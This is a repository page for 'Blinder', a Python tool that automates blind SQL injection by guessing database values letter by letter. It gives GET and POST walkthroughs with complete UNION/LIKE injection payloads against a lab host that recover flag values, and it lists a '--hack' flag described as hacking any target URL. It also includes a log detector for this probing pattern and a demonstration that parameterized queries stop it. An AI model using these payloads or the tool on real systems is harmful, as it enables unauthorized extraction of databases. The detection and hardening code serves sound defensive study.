jaymanza / blinder

This project forked from mogenn/blinder

Blinder is a tool that will help you simplify the exploitation of blind SQL injection

License: GNU General Public License v2.0

Python 100.00%

blinder's Introduction

Blinder

Have you found a blind SQL injection? Great! Now you need to export it, but are you too lazy to sort through the values? Most likely, Blinder will help you!

Blinder is a tool that iterates through candidate values letter by letter. The FUZZ placeholder marks where in the request the candidates are inserted.

                      [HELP PAGE]
Usage: python3 blinder.py -u [URL] -v [GET/URL] -p [PARAMETERS]

Flags: 

[-h] [--help]: help page.
[--url] [-u]: url to target.
[-v] [--verbs]: HTTP verb (GET, POST, PUT and etc...).
[-p] [--parameters]: parameters for the target.
[-sl] [--show_length]: show response length.
[-il] [--incorrect_length]: size of incorrect length (for the filtration).
[-ec] [--exclude_characters]: Exclude characters from the fuzzing list. Specify sequentially in a line
   By default: [',&,%]
[-hg] [--hide-greeting]: Hide greeting.
[-ta] [--to-ascii]: Convert characters to ascii code.
[-ap] [--add-percent]: Add a percent sign to the end of FUZZ.
   In this mode, other characters can be added to the end of the line. These signs may be incorrect, due to the percentage.
[-tl] [--to-lower]: Convert letters to lowercase
[--hack]: Specify the URL of the target after the --hack flag, and it will be hacked.

GET request

Specify the URL with the [-u] flag and the HTTP verb with [-v]. Our request will look like this: . To make it work correctly, add a percent sign to the end of FUZZ using the [-ap] flag. We also want to see the response length, so add the [-sl] flag.

./blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'FUZZ' -- -" -v GET -sl -ap

The end of the output looks like this:

[Screenshot: Pasted image 20211114160122]

The output shows that length 117 can be treated as the incorrect length. Because we found both upper- and lowercase letters, convert letters to lowercase with the [-tl] flag. Specify the first letter, m. For Blinder to fuzz recursively, pass the incorrect length 117 through [-il] and remove the [-sl] flag.

./blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'mFUZZ' -- -" -v GET -ap -il 117 -tl

[Screenshot: Pasted image 20211114160854]

Joining the letter m with Blinder's output gives:

my_first_flag
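
The recursive prefix search above leaves a recognizable trail in web server access logs: one client sending many like '<prefix>%' probes, with most responses sharing a single "miss" length. A detection sketch for that pattern, added here as an example and not part of Blinder; the log lines, the hit length of 140 and the function name detect_like_enumeration are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined-log style; sizes other than 117 are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Nov/2021:16:01:20 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27a%25%27+--+- HTTP/1.1" 200 117
10.0.0.5 - - [14/Nov/2021:16:01:20 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27b%25%27+--+- HTTP/1.1" 200 117
10.0.0.5 - - [14/Nov/2021:16:01:21 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27m%25%27+--+- HTTP/1.1" 200 140
10.0.0.5 - - [14/Nov/2021:16:01:21 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27ma%25%27+--+- HTTP/1.1" 200 117
10.0.0.5 - - [14/Nov/2021:16:01:22 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27mb%25%27+--+- HTTP/1.1" 200 117
10.0.0.5 - - [14/Nov/2021:16:01:22 +0000] "GET /index.php?id=%27+union+select+id,name+from+users+where+name+like+%27my%25%27+--+- HTTP/1.1" 200 140
10.0.0.9 - - [14/Nov/2021:16:02:00 +0000] "GET /index.php?id=3 HTTP/1.1" 200 152
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} (\d+)')
LIKE_RE = re.compile(r"like\s+'([^'%]*)%'", re.IGNORECASE)

def detect_like_enumeration(log_text, min_probes=4):
    """Return {client: summary} for clients sending many LIKE 'prefix%' probes."""
    probes = defaultdict(list)  # client -> [(prefix, response_size)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, size = m.groups()
        like = LIKE_RE.search(unquote_plus(target))  # decode %27, %25, '+'
        if like:
            probes[client].append((like.group(1), int(size)))
    findings = {}
    for client, seen in probes.items():
        prefixes = {p for p, _ in seen}
        sizes = [s for _, s in seen]
        # Two signatures of blind extraction: many distinct prefixes, and
        # responses clustering on one "miss" size with a few differing "hits".
        if len(prefixes) >= min_probes and len(set(sizes)) > 1:
            miss = Counter(sizes).most_common(1)[0][0]
            hits = sorted(p for p, s in seen if s != miss)
            findings[client] = {"probes": len(prefixes), "miss_size": miss,
                                "confirmed_prefixes": hits}
    return findings
```

The confirmed_prefixes field shows how much of a value the client has already recovered, which helps scope the exposure during incident response.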

POST request

In a POST request, parameters are not passed in the URL after ?. Blinder has the [-p] flag for this: specify the request parameters with [-p]. The remaining flags are the same as for the GET request.

./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'FUZZ' -- -" -sl -ap

The end of the output looks like this:

[Screenshot: Pasted image 20211114162703]

The output shows that length 184 can be treated as the incorrect length. Because we found both upper- and lowercase letters, convert letters to lowercase with the [-tl] flag. Specify the first letter, f. For Blinder to fuzz recursively, pass the incorrect length 184 through [-il] and remove the [-sl] flag.

./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'fFUZZ' -- -" -il 184 -ap -tl

[Screenshot: Pasted image 20211114163021]

Joining the letter f with Blinder's output gives:

flag
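
Both walkthroughs depend on the id parameter being concatenated into the SQL text, so the response length changes with the guessed prefix. The following added example (not code from Blinder or from the target application; the SQLite schema, the render function and all function names are assumptions) shows that length difference with a concatenated query and its absence once the parameter is bound.

```python
import sqlite3

def make_db():
    # Constructed in-memory data; the items table is an assumption.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id TEXT, title TEXT);
        CREATE TABLE users (id INTEGER, name TEXT);
        INSERT INTO items VALUES ('100', 'widget');
        INSERT INTO users VALUES (1, 'flag');
    """)
    return db

def render(rows):
    # Stand-in for the page body: its length is all a blind client observes.
    return "<ul>" + "".join(f"<li>{r[1]}</li>" for r in rows) + "</ul>"

def page_vulnerable(db, item_id):
    # Vulnerable: the parameter is concatenated into the SQL text.
    sql = "SELECT id, title FROM items WHERE id = '" + item_id + "'"
    return render(db.execute(sql).fetchall())

def page_hardened(db, item_id):
    # Hardened: the parameter is bound as data and never parsed as SQL.
    sql = "SELECT id, title FROM items WHERE id = ?"
    return render(db.execute(sql, (item_id,)).fetchall())

def response_lengths(page, db, prefixes):
    # Same parameter value as the POST walkthrough, with FUZZ replaced by
    # a prefix and the percent sign that [-ap] appends.
    value = "100' union select id,name from users where name like '{}%' -- -"
    return {p: len(page(db, value.format(p))) for p in prefixes}

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", response_lengths(page_vulnerable, db, ["f", "x"]))
    print("bound:       ", response_lengths(page_hardened, db, ["f", "x"]))
```

With the bound parameter every guess produces the same response length, so an incorrect-length filter such as [-il] has nothing to separate.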

blinder's People

Contributors

mogenn
